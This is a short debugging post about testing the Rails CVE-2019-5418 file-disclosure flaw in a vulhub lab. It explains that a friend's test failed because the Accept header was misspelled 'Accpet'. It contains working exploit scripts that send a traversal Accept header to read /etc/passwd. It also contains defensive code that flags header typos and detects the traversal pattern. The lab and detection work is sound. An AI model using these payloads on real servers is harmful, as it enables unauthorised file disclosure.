Debugging a nasty pitfall

A friend was testing the https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418 vulnerability (Rails file disclosure via the Accept header)
and wrote the following payload:

```python
import re

payload = "../../../../../../../../etc/passwd{{"
header = {
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    "Accept-Encoding": "gzip, deflate",
    "Accpet": payload  # header name exactly as it was written in the test
}
print header
target_url = target + "/robots"
# util.get_url_response is the test framework's own request helper
res = util.get_url_response(target_url, method='GET', headers=header, timeout=5)
print res.status_code
# a 200 whose body looks like /etc/passwd means the file was disclosed
if res.status_code == 200 and re.search("root:[x*]:0:0:", res.text):
    print "vulnerable"
```

The payload from GitHub reads /etc/passwd successfully, so I wrote my own version:

```python
import requests

headers = {
    "Accept-Encoding": "gzip, deflate",
    # CVE-2019-5418: Rails uses the Accept value as a template path
    "Accept": "../../../../../../../../etc/passwd{{",
    "Accept-Language": "en",
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
}

r = requests.get("http://xxx:3000/robots", headers=headers)
print r.text
```
This also reads the file successfully. Capturing both requests with Wireshark and comparing them showed that the Accept header in my friend's version never took effect.

Comparing the two side by side: Accept had been written as Accpet...
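Two checks that would have caught this earlier, added here as an example (not code from the original post or from the vulhub project): one flags header names in a test harness that are near-misses of well-known headers, the other is log-side detection of the CVE-2019-5418 Accept-header pattern. The header dictionaries in the test are constructed; the list of known headers is an assumption and can be extended.

```python
import re
from difflib import get_close_matches

# Pattern seen in CVE-2019-5418 probes: traversal segments in the Accept
# header, followed by "{{" so Rails treats the value as a template path.
TRAVERSAL_RE = re.compile(r"(\.\./){2,}.*\{\{")

# Assumed list of well-known request headers used for typo detection.
KNOWN_HEADERS = [
    "accept", "accept-encoding", "accept-language", "user-agent", "host",
]


def header_typos(headers):
    """Return {bad_name: suggestion} for header names that look like typos
    of well-known headers (e.g. 'Accpet' -> 'accept'). Unknown but
    dissimilar names (custom headers) are not reported."""
    typos = {}
    for name in headers:
        low = name.lower()
        if low in KNOWN_HEADERS:
            continue
        match = get_close_matches(low, KNOWN_HEADERS, n=1, cutoff=0.8)
        if match:
            typos[name] = match[0]
    return typos


def is_traversal_accept(headers):
    """True if the request's Accept header carries the CVE-2019-5418
    pattern. A misspelled header name is ignored, exactly as Rails
    ignores it, which is why the 'Accpet' request was harmless."""
    for name, value in headers.items():
        if name.lower() == "accept" and TRAVERSAL_RE.search(value):
            return True
    return False
```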